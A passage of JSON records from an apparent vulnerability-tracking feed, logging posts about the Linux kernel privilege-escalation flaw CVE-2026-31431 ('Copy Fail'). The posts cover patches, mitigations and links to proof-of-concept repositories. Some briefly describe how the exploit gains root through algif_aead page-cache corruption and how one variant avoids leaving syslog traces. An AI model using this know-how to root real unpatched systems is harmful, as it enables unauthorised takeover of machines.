"vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82150", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-CVE-2026-31431-C\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a bigwario\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 05:59:28\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T06:00:04.000000Z"}, {"uuid": "0ab5c407-e4a6-40ae-94ea-56e48dbf82a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Earl.mast.john1126.com.ap.brid.gy/post/3mkqu6zohemi2", "content": "For testing the Linux vulnerability (recently disclosed as \"Copy Fail CVE-2026-31431\"), I booted my notebook computer up with a live DVD, so the exploit I am testing should not get saved to the machine.\n\nWill Linux Mint 21.2 succumb to the exploit?\n\nMy [\u2026] \n\n[Original post on mast.john1126.com]", "creation_timestamp": "2026-05-01T00:26:01.042822Z"}, {"uuid": "4e6e8108-94bd-4c88-bb34-e0775a58672c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newstecnicas.info.ve/post/3mkquvrlo2k22", "content": "\ud83d\udc27 \u00bfC\u00f3mo funciona 'Copy Fail'? El exploit de 732 bytes que otorga acceso Root en Linux (CVE-2026-31431) (+MITIGACI\u00d3N) www.newstecnicas.info.ve/2026/04/copy...", "creation_timestamp": "2026-05-01T00:32:38.332529Z"}, {"uuid": "8eda1d47-1176-417e-aae8-5cd37d936fc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nodo.kahanamura.com/post/3mkqv5cflvk2i", "content": "The exploit affects *ALL DISTRIBUTIONS THAT HAVE NOT BEEN PATCHED FOR CVE-2026-31431*. \n\nI've patched my systems temporarily by disabling AEAD whilst I wait for Arch to push a new kernel if they've not done so already.\n\nYou can do so with the command in the following post:\n(RUN THIS AS ROOT!)", "creation_timestamp": "2026-05-01T00:36:47.075003Z"}, {"uuid": "aedd6891-01db-4430-b51f-9d531ef2ee00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nodo.kahanamura.com/post/3mkqv5cufjs2i", "content": "The exploit affects *ALL DISTRIBUTIONS THAT HAVE NOT BEEN PATCHED FOR CVE-2026-31431*. \n\nI've patched my systems temporarily by disabling AEAD whilst I wait for Arch to push a new kernel if they've not done so already.\n\nYou can do so with the command in the following post:\n(RUN THIS AS ROOT!)", "creation_timestamp": "2026-05-01T00:36:47.607630Z"}, {"uuid": "20222636-ae0e-4bde-ba18-b3369ac908e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nodo.kahanamura.com/post/3mkqv5cufjt2i", "content": "The exploit affects *ALL DISTRIBUTIONS THAT HAVE NOT BEEN PATCHED FOR CVE-2026-31431*. \n\nI've patched my systems temporarily by disabling AEAD whilst I wait for Arch to push a new kernel if they've not done so already.\n\nYou can do so with the command in the following post:\n(RUN THIS AS ROOT!)", "creation_timestamp": "2026-05-01T00:36:48.131812Z"}, {"uuid": "e9469974-3d5c-4972-b5bc-2a5ba0c41074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mkqvmsmyhv2q", "content": "CVE-2026-31431 "Copy Fail" is a Linux kernel flaw allowing local users to gain root by corrupting page cache of setuid binaries via algif_aead. Patches released in kernels 7.0, 6.19.12, and 6.18.22. #LinuxKernel #PrivilegeEscalation #USA", "creation_timestamp": "2026-05-01T00:45:27.748543Z"}, {"uuid": "87d885da-c23d-49ec-9802-215f2f2b05c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82246", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a sngrotesque\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 23:59:59\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nThe code after complete confusion.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T00:00:05.000000Z"}, {"uuid": "3ccfb247-afd3-4d04-a4cf-726cc2912986", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/feistel.sns.feistel.party.ap.brid.gy/post/3mkqwz547yc72", "content": "#CopyFail #cve_2026_31431 I wrote about denying containers access to AF_ALG sockets with SELinux\nhttps://blog.feistel.party/2026/04/30/deny-alg-socket-to-containers-with-selinux-to-mitigate-cve-2026-31431.html", "creation_timestamp": "2026-05-01T01:15:11.095323Z"}, {"uuid": "21b738e0-5633-4e9b-ba7e-fc71d7ca5a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ercanbrack.mastodon.online.ap.brid.gy/post/3mkqrxi4heba2", "content": "No official announcement yet, but Copy Fail (CVE-2026-31431) has already been fixed in the Fedora kernels: 6.19.12. According to Red Hat / Fedora kernel tracking, \"all current Fedora branches are already at or beyond kernel 6.19.12.\n\nTL;DR - If your Fedora system is fully updated, you are [\u2026]", "creation_timestamp": "2026-04-30T23:44:13.790019Z"}, {"uuid": "22695219-6d7b-4fff-bac6-8b00f2445f80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/fpga-riscv.bsky.social/post/3mkqsrl7mao2a", "content": "CVE-2026-31431: How 4 Bytes Turn a Linux User Into\u00a0Root\n\nIntroduction A new Linux vulnerability is making waves for one simple reason: It turns a normal user into root\u2026 in seconds. No exploit chain.No race condition.No memory leak. Just a few syscalls. This is CVE-2026-31431, also known as \u201cCopy\u2026", "creation_timestamp": "2026-04-30T23:54:25.535280Z"}, {"uuid": "8c912d97-3cd0-43e3-b550-21c122e57bf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/habr_com_news/46127", "content": "\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e LPE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u0437 10 \u0441\u0442\u0440\u043e\u043a \u043a\u043e\u0434\u0430 \u043d\u0430 Python \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Copy Fail (CVE-2026-31431), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u043d\u0430 \u0431\u0430\u0437\u0435 Linux. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043e\u0434\u0438\u043d \u043a\u043b\u0438\u043a \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0443\u0440\u043e\u0432\u043d\u044f root \u0431\u0435\u0437 race condition, \u0431\u0435\u0437 \u043f\u043e\u0434\u0431\u043e\u0440\u0430 \u043e\u0444\u0444\u0441\u0435\u0442\u043e\u0432 \u0438 \u0431\u0435\u0437 \u0441\u043b\u043e\u0436\u043d\u043e\u0439 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0438.\n\n#\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c #\u041e\u0421", "creation_timestamp": "2026-04-30T07:43:23.000000Z"}, {"uuid": "9a63a073-e358-401c-a55a-a7103a60435f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82241", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431---Copy-Fail-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a maniakh\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 22:54:29\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nBu depo, Linux cekirdeginde (kernel) bulunan CVE-2026-3143 (Copy Fail) zafiyetinin egitim amacli analizini icermektedir. Zafiyet, algif_aead mod\u00fcl\u00fcndeki bir optimizasyon hatasini kullanarak sayfa onbellegindeki (page cache) salt-okunur dosyalari manipule etmeye olanak tanir.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T23:00:04.000000Z"}, {"uuid": "99094a8d-47fa-45f9-9b91-4e60cb03e1b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82224", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a SeanRickerd\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 16:59:22\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nExploit for cve-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T17:00:05.000000Z"}, {"uuid": "978f06b0-bba7-44c0-ae55-7540941770d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82231", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a pcdoyle\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 18:50:50\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T19:00:04.000000Z"}, {"uuid": "92ae75d5-4c73-4211-a74c-ceac585ff0f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82233", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431-mitigation\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a amdisrar\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 19:59:40\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nTemporary mitigation for Linux kernel local privilege escalation CVE-2026-31431 (AF_ALG interface)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T20:00:04.000000Z"}, {"uuid": "95fa610d-e027-4562-bd7f-f6097882ae36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82207", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Paranoid-Copy-Fail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a scriptzteam\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 14:58:59\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nParanoid disable whole AF_ALG + algif_* modules - Copy Fail (CVE-2026-31431)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T15:00:05.000000Z"}, {"uuid": "96f015e7-8ca5-421a-951e-966f85cc6489", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/chezo.uno/post/3mkrbprxbz22q", "content": "WSL2\u3067Copy fail\u8abf\u3079\u305f\u3089\u3001\u3059\u3067\u306bdisable\u3055\u308c\u3066\u305f\u3063\u307d\u3044\n\n```\n\u276f grep -r algif_aead /etc/modprobe.d/\n\n/etc/modprobe.d/disable-algif_aead.conf:# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)\n/etc/modprobe.d/disable-algif_aead.conf:install algif_aead /bin/false\n```", "creation_timestamp": "2026-05-01T04:21:49.168761Z"}, {"uuid": "3511dbc7-dfe1-44c5-a694-d7f251aba00f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3mkrdnwj4aa2j", "content": "The latest update for #Mendit includes \"CVE-2026-31431 (Copy Fail): #Linux Kernel LPE\" and \"Shai-Hulud Strikes #SAP: Supply Chain Worm Weaponized Claude Code to Compromise the CAP Framework\".\n \n#CyberSecurity #DevOps #OpenSource #Compliance https://opsmtrs.com/3zEYo7d", "creation_timestamp": "2026-05-01T04:56:36.577918Z"}, {"uuid": "bac6b8fc-55b5-4d54-b8b2-575228c88c8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mkrepvc7gcvh", "content": "Copy Fail\uff1a9\u5e74\u9593\u898b\u904e\u3054\u3055\u308c\u3066\u3044\u305fLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3082\u516c\u958b\uff08CVE-2026-31431\uff09 | Codebook\uff5cSecurity News https://codebook.machinarecord.com/threatreport/silobreaker-cyber-alert/45427/", "creation_timestamp": "2026-05-01T05:16:00.011645Z"}, {"uuid": "fd32a886-8687-4420-80c2-e3f94202e445", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/xchatter.techmeme.com/post/3mkrfp7ww3x2y", "content": "This tweet appeared under this Techmeme headline:\n\n@vxunderground:\n\nCVE-2026-31431 a/k/a CopyFail > Linux LPE > Description sounds like AI slop > Exploit is legit > Impacts every Linux kernel from 2017 - Now > Proof-of-concept released > It's Wednesday? https://copy.fail/", "creation_timestamp": "2026-05-01T05:33:08.096051Z"}, {"uuid": "4199a5fb-829d-4d30-b3f8-491524113989", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/xchatter.techmeme.com/post/3mkrfrerlqi24", "content": "This tweet appeared under this Techmeme headline:\n\nBrian Pak / @brian_pak:\n\nTime to talk about this one. CopyFail (CVE-2026-31431) -- a 732-byte Python script that roots every Linux distro shipped since 2017. \ud83e\uddf5", "creation_timestamp": "2026-05-01T05:34:19.607417Z"}, {"uuid": "e4a0a872-5b87-42eb-b38b-9570564bcfe0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/yabuki.bsky.social/post/3mkr2ajwbxa25", "content": "Debian\u3067\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3fix\u3057\u305f\u30ab\u30fc\u30cd\u30eb\u304c\u964d\u308a\u3066\u304d\u3066\u3044\u308b\u306e\u3067\u3001\u5404\u81ea\u5bfe\u5fdc\u3092\u304a\u9858\u3044\u3057\u307e\u3059\u3002\u308f\u305f\u3057\u306f\u5bfe\u5fdc\u3057\u307e\u3057\u305f\u3002\n\nCVE-2026-31431\nsecurity-tracker.debian.org/tracker/CVE-...", "creation_timestamp": "2026-05-01T02:08:06.612667Z"}, {"uuid": "1a19d7a2-b2fb-449b-92ea-7eef04f0d11d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3mkr2zq7oej24", "content": "\u201cCopy Fail\u201d Linux Zero-Day CVE-2026-31431 Sparks Panic Over Root-Level Takeover Claims Across Major\u00a0Systems\n\nIntroduction: A Quiet Linux Flaw Turning Into a Loud Underground Alarm A newly discussed Linux vulnerability tracked as CVE-2026-31431, also referred to in underground forums as \u201cCopy Fail,\u201d\u2026", "creation_timestamp": "2026-05-01T02:22:09.781681Z"}, {"uuid": "ccdc779d-3acf-445a-80e1-70ec46039883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mkr2taj5rie2", "content": "CVE-2026-31431 (Copy Fail): Linux Kernel LPE Article URL: https://securityboulevard.com/2026/04/cve-2026-31431-copy-fail-linux-kernel-lpe/ Comments URL: https://news.ycombinator.com/item?id=4797035...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-01T02:28:51.008640Z"}, {"uuid": "1d9bd093-42aa-4fef-af1e-94da1095abe3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mkr3im64kw25", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 213 interactions\nCVE-2026-3854: 53 interactions\nCVE-2026-41940: 32 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-31431: 160 interactions\nCVE-2026-41940: 31 interactions\nCVE-2025-31431: 29 interactions\n", "creation_timestamp": "2026-05-01T02:30:27.803104Z"}, {"uuid": "3ab6b46c-0ad6-4737-9c84-6eed5db9a6e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mkr3i6agi2vh", "content": "Copy Fail \u2014 CVE-2026-31431 https://copy.fail/", "creation_timestamp": "2026-05-01T02:30:37.091398Z"}, {"uuid": "6fbf8982-2fdd-4dba-b03f-6651974987cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116496993374350234", "content": "As mentioned earlier in this thread, the su corruption route was only one possible strategy to be used by this exploit.\nHere's another variant of the exploit that doesn't have to rely on such things to achieve its goal.\nFor example, the simple escalate argument simply removes the password requirement for su'ing to root.  There are other payloads also possible.\nSuch exploits will not have process 'su' launched '/bin/sh IOCs in the syslogs.  Perhaps all that is relevant is the alg: No test for authencesn(hmac(sha256),cbc(aes)) (authencesn(hmac-sha256-lib,cbc-aes-aesni)) part.  But there's no evidence of what was done.", "creation_timestamp": "2026-05-01T02:37:38.256314Z"}, {"uuid": "e1996a4e-717a-48ce-966e-eaf40f2433e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82283", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail-briefing\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jodonnel\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a HTML\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 04:59:26\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 (Copy Fail) \u2014 Security briefings and remediation comparison\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T05:00:04.000000Z"}, {"uuid": "e11456ba-4a17-4e57-abac-0dbb87c68843", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/bontchev.infosec.exchange.ap.brid.gy/post/3mkrid6wtl2d2", "content": "CopyFail implementation in Rust:\n\nhttps://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail", "creation_timestamp": "2026-05-01T06:24:59.058032Z"}, {"uuid": "c46a49ed-d617-4de7-bb5c-1e7cf3705061", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/lemagit.bsky.social/post/3mkrin4qd3l23", "content": "CVE-2026-31431 : \u00c9vasion de privil\u00e8ges noyau Linux. \ud83d\udc27 Ce n'est pas juste un bug, c'est une porte vers le root sur votre cluster. Comprenez la m\u00e9canique et les d\u00e9fenses imm\u00e9diates avant l'exploitation. [Lien] [lire]", "creation_timestamp": "2026-05-01T06:25:38.472365Z"}, {"uuid": "35321f35-ea7f-4375-9e7a-a1557aa3b89e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/bryanseah234.bsky.social/post/3mkriodz4nk2d", "content": "I'm currently watching \"This Linux exploit is quite powerful (CopyFail - CVE-2026-31431)\"\n https://www.youtube.com/watch/cIM_wCS3axw", "creation_timestamp": "2026-05-01T06:26:19.450924Z"}, {"uuid": "df85db3c-cc0c-4f4f-b47f-2c02c30844c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkriud27n22j", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-01T06:29:39.667796Z"}, {"uuid": "6ae4f993-2358-4070-8731-0dabda5024f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mkr5qhknds2e", "content": 